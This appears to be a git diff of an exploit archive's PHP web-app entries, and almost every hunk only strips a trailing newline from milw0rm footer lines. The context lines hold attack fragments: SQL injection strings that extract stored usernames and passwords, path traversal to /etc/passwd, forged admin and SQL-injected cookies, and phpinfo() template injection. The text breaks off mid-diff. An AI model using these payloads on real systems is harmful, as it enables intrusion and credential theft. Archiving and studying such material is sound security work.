index ce023da8b..1c89a3254 100755 --- a/platforms/php/webapps/8297.txt +++ b/platforms/php/webapps/8297.txt @@ -75,4 +75,4 @@ VI. TIMELINE 20090315 First patch proposed 20090327 Bug marked resolved and patch in tree -# milw0rm.com [2009-03-27] +# milw0rm.com [2009-03-27] \ No newline at end of file diff --git a/platforms/php/webapps/8298.pl b/platforms/php/webapps/8298.pl index 4a3d8a066..a63639beb 100755 --- a/platforms/php/webapps/8298.pl +++ b/platforms/php/webapps/8298.pl @@ -206,4 +206,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-03-27] +# milw0rm.com [2009-03-27] \ No newline at end of file diff --git a/platforms/php/webapps/8302.php b/platforms/php/webapps/8302.php index 4ac8810ab..4d5a20140 100755 --- a/platforms/php/webapps/8302.php +++ b/platforms/php/webapps/8302.php @@ -365,4 +365,4 @@ print "\n[*] your cookie -> glfusion=".$uid."; glf_password=".$_hash."; glf_theme=nouveau;"; ?> -# milw0rm.com [2009-03-29] +# milw0rm.com [2009-03-29] \ No newline at end of file diff --git a/platforms/php/webapps/8304.txt b/platforms/php/webapps/8304.txt index 5d796986f..ea7643bad 100755 --- a/platforms/php/webapps/8304.txt +++ b/platforms/php/webapps/8304.txt @@ -36,4 +36,4 @@ javascript:document.cookie = "user=1,' or ' 1=1--; path=/"; [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-03-29] +# milw0rm.com [2009-03-29] \ No newline at end of file diff --git a/platforms/php/webapps/8305.txt b/platforms/php/webapps/8305.txt index f57f2634a..7c925d95e 100755 --- a/platforms/php/webapps/8305.txt +++ b/platforms/php/webapps/8305.txt @@ -53,4 +53,4 @@ http://www.iwarecms.nl/demo/index.php?D=54&cmd=33&file=ImageGallery_1.0.0&catego #[!] R.I.P redc00de ############################## -# milw0rm.com [2009-03-29] +# milw0rm.com [2009-03-29] \ No newline at end of file diff --git a/platforms/php/webapps/8309.txt b/platforms/php/webapps/8309.txt index 8ca4c68b0..06bb3a42f 100755 --- a/platforms/php/webapps/8309.txt +++ b/platforms/php/webapps/8309.txt @@ -55,4 +55,4 @@ ######################################################################### -# milw0rm.com [2009-03-30] +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/8315.txt b/platforms/php/webapps/8315.txt index 2bff2096d..e53282322 100755 --- a/platforms/php/webapps/8315.txt +++ b/platforms/php/webapps/8315.txt @@ -103,4 +103,4 @@ exit(); 4- http://site.it/forcedownload.php?file=[file] ######################################################################################## -# milw0rm.com [2009-03-30] +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/8317.pl b/platforms/php/webapps/8317.pl index 1a4507a2d..9efac7955 100755 --- a/platforms/php/webapps/8317.pl +++ b/platforms/php/webapps/8317.pl @@ -314,4 +314,4 @@ sub help() { exit(0); } -# milw0rm.com [2009-03-30] +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/8318.txt b/platforms/php/webapps/8318.txt index 069d12e5b..7f1fd55ee 100755 --- a/platforms/php/webapps/8318.txt +++ b/platforms/php/webapps/8318.txt @@ -87,4 +87,4 @@ Homepage: http://www.e-rdc.org/ -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2009-03-30] +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/8319.txt b/platforms/php/webapps/8319.txt index 283548597..d11fac30c 100755 --- a/platforms/php/webapps/8319.txt +++ b/platforms/php/webapps/8319.txt @@ -216,4 +216,4 @@ No fix. ************************************************* -# milw0rm.com [2009-03-30] +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/832.txt b/platforms/php/webapps/832.txt index 3bab413ce..048a764da 100755 --- a/platforms/php/webapps/832.txt +++ b/platforms/php/webapps/832.txt @@ -9,4 +9,4 @@ Proof of concept ================ http://site.com/misc.php?do=page&template={${phpinfo()}} -# milw0rm.com [2005-02-22] +# milw0rm.com [2005-02-22] \ No newline at end of file diff --git a/platforms/php/webapps/8323.txt b/platforms/php/webapps/8323.txt index 2d0aee59e..0e1f7c5be 100755 --- a/platforms/php/webapps/8323.txt +++ b/platforms/php/webapps/8323.txt @@ -57,4 +57,4 @@ No fix. ************************************************* -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8324.php b/platforms/php/webapps/8324.php index 9228aec02..e90d3ef6b 100755 --- a/platforms/php/webapps/8324.php +++ b/platforms/php/webapps/8324.php @@ -205,4 +205,4 @@ if (strstr($html,"666999")) } ?> -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8326.rb b/platforms/php/webapps/8326.rb index 7debaa4d9..08be726d0 100755 --- a/platforms/php/webapps/8326.rb +++ b/platforms/php/webapps/8326.rb @@ -1,4 +1,3 @@ - require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -452,4 +451,4 @@ class Metasploit3 < Msf::Auxiliary ############################################################ end -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8327.txt b/platforms/php/webapps/8327.txt index 5f8544fed..14b695109 100755 --- a/platforms/php/webapps/8327.txt +++ b/platforms/php/webapps/8327.txt @@ -474,4 +474,4 @@ Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ ---------------------------------- [ EOF ] --------------------------------- -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8328.txt b/platforms/php/webapps/8328.txt index 226c84247..c9415764b 100755 --- a/platforms/php/webapps/8328.txt +++ b/platforms/php/webapps/8328.txt @@ -52,4 +52,4 @@ include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GL http://www.site.com/path/index.php?WE_LANGUAGE=../../../../../../../../etc/passwd%00 -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8329.txt b/platforms/php/webapps/8329.txt index 32a0d8df3..1f6ff1ce4 100755 --- a/platforms/php/webapps/8329.txt +++ b/platforms/php/webapps/8329.txt @@ -19,4 +19,4 @@ WWW.h4ckf0ru.com mission complete --------------------------------------------------------- -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8330.txt b/platforms/php/webapps/8330.txt index 0b0c71595..8c5dc430e 100755 --- a/platforms/php/webapps/8330.txt +++ b/platforms/php/webapps/8330.txt @@ -31,4 +31,4 @@ Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users-- Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users-- -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8331.txt b/platforms/php/webapps/8331.txt index 6a7636e12..75e563b11 100755 --- a/platforms/php/webapps/8331.txt +++ b/platforms/php/webapps/8331.txt @@ -34,4 +34,4 @@ Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines) (c) Dimi4, 2009 greetz to antichat -# milw0rm.com [2009-03-31] +# milw0rm.com [2009-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/8334.txt b/platforms/php/webapps/8334.txt index 638036bad..5ab977047 100755 --- a/platforms/php/webapps/8334.txt +++ b/platforms/php/webapps/8334.txt @@ -42,4 +42,4 @@ path/ki_base/ki_makepic.php?file=[local_file] path/ki_base/ki_nojsdisplayimage.php?file=[local_file] ------------------------------------------------------------ -# milw0rm.com [2009-04-01] +# milw0rm.com [2009-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/8341.txt b/platforms/php/webapps/8341.txt index 9a3c9a4f4..14f93964a 100755 --- a/platforms/php/webapps/8341.txt +++ b/platforms/php/webapps/8341.txt @@ -12,4 +12,4 @@ Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends o // http://www.youtube.com/watch?v=dX_PLimGeHk&flip=1 :P -# milw0rm.com [2009-04-01] +# milw0rm.com [2009-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/8342.txt b/platforms/php/webapps/8342.txt index bb8b57118..8eee494d3 100755 --- a/platforms/php/webapps/8342.txt +++ b/platforms/php/webapps/8342.txt @@ -77,4 +77,4 @@ Content-Disposition: form-data; name="type" new ------------feIyX3Pd15MPzClqGeALKe-- -# milw0rm.com [2009-04-01] +# milw0rm.com [2009-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/8346.txt b/platforms/php/webapps/8346.txt index ce6aad077..054499b9d 100755 --- a/platforms/php/webapps/8346.txt +++ b/platforms/php/webapps/8346.txt @@ -32,4 +32,4 @@ | -------- Vrs-hCk , Nyubi (Solpot) , OoN_Boy ---------- | [o]------------------------------------------------------------------------------------[o] -# milw0rm.com [2009-04-03] +# milw0rm.com [2009-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/8347.php b/platforms/php/webapps/8347.php index 42d8da365..67ff34b41 100755 --- a/platforms/php/webapps/8347.php +++ b/platforms/php/webapps/8347.php @@ -407,4 +407,4 @@ ?> -# milw0rm.com [2009-04-03] +# milw0rm.com [2009-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/8348.txt b/platforms/php/webapps/8348.txt index cfd991671..3b380b84e 100755 --- a/platforms/php/webapps/8348.txt +++ b/platforms/php/webapps/8348.txt @@ -54,4 +54,4 @@ -= AnA MaGhribi Den MouK =- -===========================================================================================- -# milw0rm.com [2009-04-03] +# milw0rm.com [2009-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/8349.c b/platforms/php/webapps/8349.c index dabfd5445..f7b9d3c41 100755 --- a/platforms/php/webapps/8349.c +++ b/platforms/php/webapps/8349.c @@ -241,4 +241,4 @@ int main(int argc, char *argv[]) { } -// milw0rm.com [2009-04-03] +// milw0rm.com [2009-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/8350.txt b/platforms/php/webapps/8350.txt index d1544afff..28b61a421 100755 --- a/platforms/php/webapps/8350.txt +++ b/platforms/php/webapps/8350.txt @@ -22,4 +22,4 @@ Go: /index.php?ok=phpinfo(); ================================================================================ -# milw0rm.com [2009-04-03] +# milw0rm.com [2009-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/8351.pl b/platforms/php/webapps/8351.pl index a018ee3af..c4de310aa 100755 --- a/platforms/php/webapps/8351.pl +++ b/platforms/php/webapps/8351.pl @@ -86,4 +86,4 @@ sub search_md5 } } -# milw0rm.com [2009-04-03] +# milw0rm.com [2009-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/8353.txt b/platforms/php/webapps/8353.txt index 98ea12aaf..28d9701d8 100755 --- a/platforms/php/webapps/8353.txt +++ b/platforms/php/webapps/8353.txt @@ -59,4 +59,4 @@ No fix. ************************************************* -# milw0rm.com [2009-04-06] +# milw0rm.com [2009-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/8355.txt b/platforms/php/webapps/8355.txt index dd485d3ba..199f6d404 100755 --- a/platforms/php/webapps/8355.txt +++ b/platforms/php/webapps/8355.txt @@ -31,4 +31,4 @@ http://target.com/flexadmin/ *************************************** -# milw0rm.com [2009-04-06] +# milw0rm.com [2009-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/8357.py b/platforms/php/webapps/8357.py index a27c1e127..7b714d32a 100755 --- a/platforms/php/webapps/8357.py +++ b/platforms/php/webapps/8357.py @@ -81,4 +81,4 @@ else: print "Output:" print data -# milw0rm.com [2009-04-06] +# milw0rm.com [2009-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/8361.txt b/platforms/php/webapps/8361.txt index 45aee5c46..81f424e42 100755 --- a/platforms/php/webapps/8361.txt +++ b/platforms/php/webapps/8361.txt @@ -216,4 +216,4 @@ No fix. ************************************************* -# milw0rm.com [2009-04-07] +# milw0rm.com [2009-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/8362.php b/platforms/php/webapps/8362.php index 53e123461..14907fcbc 100755 --- a/platforms/php/webapps/8362.php +++ b/platforms/php/webapps/8362.php @@ -166,4 +166,4 @@ while(1) ?> -# milw0rm.com [2009-04-07] +# milw0rm.com [2009-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/8364.txt b/platforms/php/webapps/8364.txt index 17544f2c5..0c54a45d8 100755 --- a/platforms/php/webapps/8364.txt +++ b/platforms/php/webapps/8364.txt @@ -214,4 +214,4 @@ Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com -# milw0rm.com [2009-04-08] +# milw0rm.com [2009-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/8365.txt b/platforms/php/webapps/8365.txt index 5d1835215..f97261ed9 100755 --- a/platforms/php/webapps/8365.txt +++ b/platforms/php/webapps/8365.txt @@ -40,4 +40,4 @@ ######################################## -# milw0rm.com [2009-04-08] +# milw0rm.com [2009-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/8366.txt b/platforms/php/webapps/8366.txt index 3d24f16a6..3f34eea88 100755 --- a/platforms/php/webapps/8366.txt +++ b/platforms/php/webapps/8366.txt @@ -36,4 +36,4 @@ ######################################## -# milw0rm.com [2009-04-08] +# milw0rm.com [2009-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/8367.txt b/platforms/php/webapps/8367.txt index 4b5bb12a8..a35add902 100755 --- a/platforms/php/webapps/8367.txt +++ b/platforms/php/webapps/8367.txt @@ -40,4 +40,4 @@ ######################################## -# milw0rm.com [2009-04-08] +# milw0rm.com [2009-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/8372.txt b/platforms/php/webapps/8372.txt index e76c7f040..9c49afc92 100755 --- a/platforms/php/webapps/8372.txt +++ b/platforms/php/webapps/8372.txt @@ -21,4 +21,4 @@ dork: "powered by Photo-Graffix Flash Image Gallery" "powered by Photo-Graffix" =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -# milw0rm.com [2009-04-08] +# milw0rm.com [2009-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/8373.txt b/platforms/php/webapps/8373.txt index 8e58e2987..6b85fb8b2 100755 --- a/platforms/php/webapps/8373.txt +++ b/platforms/php/webapps/8373.txt @@ -28,4 +28,4 @@ http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int, #---------------------------------------------------------------------------------------------- -# milw0rm.com [2009-04-08] +# milw0rm.com [2009-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/8374.txt b/platforms/php/webapps/8374.txt index 8abb239f3..7a0e479ce 100755 --- a/platforms/php/webapps/8374.txt +++ b/platforms/php/webapps/8374.txt @@ -33,4 +33,4 @@ @~~= Bir Süre Yoqum :( @~~====================================================~~@ -# milw0rm.com [2009-04-08] +# milw0rm.com [2009-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/8376.php b/platforms/php/webapps/8376.php index 452f613bc..2838d4035 100755 --- a/platforms/php/webapps/8376.php +++ b/platforms/php/webapps/8376.php @@ -456,4 +456,4 @@ print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n"; ?> -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/8380.txt b/platforms/php/webapps/8380.txt index 3a53d1bfb..58442a3e1 100755 --- a/platforms/php/webapps/8380.txt +++ b/platforms/php/webapps/8380.txt @@ -28,4 +28,4 @@ Thanx : www.h4ckf0ru.com/vb/ ------------------------------------------------------------------------------------ -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/8382.txt b/platforms/php/webapps/8382.txt index e037fa9c6..7d79a2b9f 100755 --- a/platforms/php/webapps/8382.txt +++ b/platforms/php/webapps/8382.txt @@ -61,4 +61,4 @@ osirys[~]>$ Game Over. -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/8383.txt b/platforms/php/webapps/8383.txt index 7f19bf532..94be5fd94 100755 --- a/platforms/php/webapps/8383.txt +++ b/platforms/php/webapps/8383.txt @@ -117,4 +117,4 @@ username and password in the cookies. ************************************************* -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/8385.txt b/platforms/php/webapps/8385.txt index 0bdbf7ed6..3829a856a 100755 --- a/platforms/php/webapps/8385.txt +++ b/platforms/php/webapps/8385.txt @@ -28,4 +28,4 @@ Thanx : www.h4ckf0ru.com/vb/ ------------------------------------------------------------------------------------ -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/8386.txt b/platforms/php/webapps/8386.txt index b9fd6ae2f..8d86bd2f1 100755 --- a/platforms/php/webapps/8386.txt +++ b/platforms/php/webapps/8386.txt @@ -28,4 +28,4 @@ Thanx : www.h4ckf0ru.com/vb/ ------------------------------------------------------------------------------------ -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/8387.txt b/platforms/php/webapps/8387.txt index 6b9115c89..2c76a8c7c 100755 --- a/platforms/php/webapps/8387.txt +++ b/platforms/php/webapps/8387.txt @@ -93,4 +93,4 @@ No fix. ************************************************* -# milw0rm.com [2009-04-09] +# milw0rm.com [2009-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/8388.txt b/platforms/php/webapps/8388.txt index b2d2848f2..8ae4746e9 100755 --- a/platforms/php/webapps/8388.txt +++ b/platforms/php/webapps/8388.txt @@ -68,4 +68,4 @@ You must delete install.php after installation. ************************************************* -# milw0rm.com [2009-04-10] +# milw0rm.com [2009-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/8389.txt b/platforms/php/webapps/8389.txt index 4df6dc49b..07e9f3e1a 100755 --- a/platforms/php/webapps/8389.txt +++ b/platforms/php/webapps/8389.txt @@ -64,4 +64,4 @@ No fix. ************************************************* -# milw0rm.com [2009-04-10] +# milw0rm.com [2009-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/8394.txt b/platforms/php/webapps/8394.txt index dbcd14c4b..83afcba24 100755 --- a/platforms/php/webapps/8394.txt +++ b/platforms/php/webapps/8394.txt @@ -32,4 +32,4 @@ ############################################################################################### -# milw0rm.com [2009-04-10] +# milw0rm.com [2009-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/8395.txt b/platforms/php/webapps/8395.txt index 99ac58cf0..d3c96982a 100755 --- a/platforms/php/webapps/8395.txt +++ b/platforms/php/webapps/8395.txt @@ -26,4 +26,4 @@ if($_GET['language']) { ################################################################################## -# milw0rm.com [2009-04-10] +# milw0rm.com [2009-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/8396.pl b/platforms/php/webapps/8396.pl index e796c474a..2ce7cc5f7 100755 --- a/platforms/php/webapps/8396.pl +++ b/platforms/php/webapps/8396.pl @@ -171,4 +171,4 @@ sub exploit } } -# milw0rm.com [2009-04-10] +# milw0rm.com [2009-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/8399.pl b/platforms/php/webapps/8399.pl index 461bd6f07..7f45c255e 100755 --- a/platforms/php/webapps/8399.pl +++ b/platforms/php/webapps/8399.pl @@ -103,4 +103,4 @@ sub Usage::Exploit() exit; } -# milw0rm.com [2009-04-13] +# milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/8408.txt b/platforms/php/webapps/8408.txt index b0962974c..ed8f1985d 100755 --- a/platforms/php/webapps/8408.txt +++ b/platforms/php/webapps/8408.txt @@ -93,4 +93,4 @@ if(!$session->isAdmin()){ ########################################################################################### -# milw0rm.com [2009-04-13] +# milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/8409.txt b/platforms/php/webapps/8409.txt index 0506682b0..22d4e9e55 100755 --- a/platforms/php/webapps/8409.txt +++ b/platforms/php/webapps/8409.txt @@ -19,4 +19,4 @@ xpl: /path/include/languages/check.php?lang=[local file]%00 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=- -# milw0rm.com [2009-04-13] +# milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/8414.txt b/platforms/php/webapps/8414.txt index 75d522806..5bf86e0ba 100755 --- a/platforms/php/webapps/8414.txt +++ b/platforms/php/webapps/8414.txt @@ -37,4 +37,4 @@ Thanx : www.h4ckf0ru.com/vb/ ------------------------------------------------------------------------------------ -# milw0rm.com [2009-04-13] +# milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/8415.txt b/platforms/php/webapps/8415.txt index b52925d20..863fce915 100755 --- a/platforms/php/webapps/8415.txt +++ b/platforms/php/webapps/8415.txt @@ -46,4 +46,4 @@ ====================================================================================== -# milw0rm.com [2009-04-13] +# milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/8417.txt b/platforms/php/webapps/8417.txt index df5f44642..2bc2778a8 100755 --- a/platforms/php/webapps/8417.txt +++ b/platforms/php/webapps/8417.txt @@ -34,4 +34,4 @@ Proud to be Albanian R.I.P redc00de ########################### -# milw0rm.com [2009-04-13] +# milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/8418.pl b/platforms/php/webapps/8418.pl index ca5fb7b89..10f63c865 100755 --- a/platforms/php/webapps/8418.pl +++ b/platforms/php/webapps/8418.pl @@ -102,4 +102,4 @@ print "[!] Please Choose a valid flag -DD for database disclosure & -XSS For Cro exit(); } -# milw0rm.com [2009-04-13] +# milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/8423.txt b/platforms/php/webapps/8423.txt index da7f77adf..a570a7f3a 100755 --- a/platforms/php/webapps/8423.txt +++ b/platforms/php/webapps/8423.txt @@ -28,4 +28,4 @@ | BeHave oR BeGone !!! | [o]------------------------------------------------------------------------------------[o] -# milw0rm.com [2009-04-14] +# milw0rm.com [2009-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/8424.txt b/platforms/php/webapps/8424.txt index 776acb1f0..00f2c4012 100755 --- a/platforms/php/webapps/8424.txt +++ b/platforms/php/webapps/8424.txt @@ -77,4 +77,4 @@ Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru -# milw0rm.com [2009-04-14] +# milw0rm.com [2009-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/8425.txt b/platforms/php/webapps/8425.txt index 00fe93581..b72a738e4 100755 --- a/platforms/php/webapps/8425.txt +++ b/platforms/php/webapps/8425.txt @@ -56,4 +56,4 @@ http://revista/estilo/[ANY STYLE]/lista.php?email= ------------------------------------------------------------------------ -# milw0rm.com [2009-04-14] +# milw0rm.com [2009-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/8431.txt b/platforms/php/webapps/8431.txt index 1877f47cc..37f5dc31f 100755 --- a/platforms/php/webapps/8431.txt +++ b/platforms/php/webapps/8431.txt @@ -15,4 +15,4 @@ ################################################################################## -# milw0rm.com [2009-04-14] +# milw0rm.com [2009-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/8432.txt b/platforms/php/webapps/8432.txt index 9f8a50d1c..39db14b71 100755 --- a/platforms/php/webapps/8432.txt +++ b/platforms/php/webapps/8432.txt @@ -84,4 +84,4 @@ if (isset($_POST['username']) == TRUE) { PoC: POST: username='[foo] Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+ -# milw0rm.com [2009-04-14] +# milw0rm.com [2009-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/8433.txt b/platforms/php/webapps/8433.txt index 2e84440ff..1bd6fdd89 100755 --- a/platforms/php/webapps/8433.txt +++ b/platforms/php/webapps/8433.txt @@ -25,4 +25,4 @@ Search: ' union select database(),version(),user(),4,5,6/* # (c) Dimi4, UASC (http://uasc.org.ua) -# milw0rm.com [2009-04-14] +# milw0rm.com [2009-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/8435.txt b/platforms/php/webapps/8435.txt index 5d1189280..02569ba9a 100755 --- a/platforms/php/webapps/8435.txt +++ b/platforms/php/webapps/8435.txt @@ -42,4 +42,4 @@ <<->> All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites -# milw0rm.com [2009-04-14] +# milw0rm.com [2009-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/8436.txt b/platforms/php/webapps/8436.txt index 8aaa99837..a05726ae4 100755 --- a/platforms/php/webapps/8436.txt +++ b/platforms/php/webapps/8436.txt @@ -46,4 +46,4 @@ <<->> special greetz to His0k4 >> ( translate this if u can essa7 emba7 emboo ) if u can i will translate ur she3ar -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8437.txt b/platforms/php/webapps/8437.txt index 04b5be915..712182139 100755 --- a/platforms/php/webapps/8437.txt +++ b/platforms/php/webapps/8437.txt @@ -44,4 +44,4 @@ <<->> special greetz to His0k4 >> ( translate this if u can essa7 emba7 emboo ) if u can i will translate ur she3ar -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8438.txt b/platforms/php/webapps/8438.txt index 957d3ca7d..590824c7b 100755 --- a/platforms/php/webapps/8438.txt +++ b/platforms/php/webapps/8438.txt @@ -42,4 +42,4 @@ <<->> All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8439.txt b/platforms/php/webapps/8439.txt index c312e580c..5dfd72666 100755 --- a/platforms/php/webapps/8439.txt +++ b/platforms/php/webapps/8439.txt @@ -44,4 +44,4 @@ <<->> special greetz to His0k4 >> ( translate this if u can essa7 emba7 emboo ) if u can i will translate ur she3ar -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8440.txt b/platforms/php/webapps/8440.txt index 78b357111..303da3593 100755 --- a/platforms/php/webapps/8440.txt +++ b/platforms/php/webapps/8440.txt @@ -42,4 +42,4 @@ <<->> All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8441.txt b/platforms/php/webapps/8441.txt index 9d0384034..3938c1056 100755 --- a/platforms/php/webapps/8441.txt +++ b/platforms/php/webapps/8441.txt @@ -42,4 +42,4 @@ <<->> All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8442.txt b/platforms/php/webapps/8442.txt index e2d2c56ba..d6d319b56 100755 --- a/platforms/php/webapps/8442.txt +++ b/platforms/php/webapps/8442.txt @@ -43,4 +43,4 @@ <<->> All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8443.txt b/platforms/php/webapps/8443.txt index 7dfe17bd7..5b12f55b7 100755 --- a/platforms/php/webapps/8443.txt +++ b/platforms/php/webapps/8443.txt @@ -63,4 +63,4 @@ yildirimordulari.com/script/detail.php?adtype=LFÝ%00 [~] [~] ---------------------------------------------------------------------- -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8446.txt b/platforms/php/webapps/8446.txt index ab28bbb1a..c5a450a68 100755 --- a/platforms/php/webapps/8446.txt +++ b/platforms/php/webapps/8446.txt @@ -24,4 +24,4 @@ dork: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2009-04-15] +# milw0rm.com [2009-04-15] \ No newline at end of file diff --git a/platforms/php/webapps/8448.php b/platforms/php/webapps/8448.php index 1266662fa..7373122a6 100755 --- a/platforms/php/webapps/8448.php +++ b/platforms/php/webapps/8448.php @@ -334,4 +334,4 @@ print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n"; ?> -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8449.txt b/platforms/php/webapps/8449.txt index 74509fbb4..8b07e2903 100755 --- a/platforms/php/webapps/8449.txt +++ b/platforms/php/webapps/8449.txt @@ -109,4 +109,4 @@ http://www.sierracazorla.com/nethoteles/admin/ ############################################################################# -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8450.txt b/platforms/php/webapps/8450.txt index 41f026fdb..058be46c5 100755 --- a/platforms/php/webapps/8450.txt +++ b/platforms/php/webapps/8450.txt @@ -36,4 +36,4 @@ javascript:document.cookie = "auth=admin; path=/"; [~] [~] ---------------------------------------------------------------------- -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8453.txt b/platforms/php/webapps/8453.txt index 8d048f406..af375cd55 100755 --- a/platforms/php/webapps/8453.txt +++ b/platforms/php/webapps/8453.txt @@ -118,4 +118,4 @@ You can use any cookie editor and you have one nice shot (XSSSHEll+XSSTunnel = m -------------------EOF---------------------------------->>>ENJOY IT! -# milw0rm.com [2009-04-16] +# milw0rm.com [2009-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/8454.txt b/platforms/php/webapps/8454.txt index 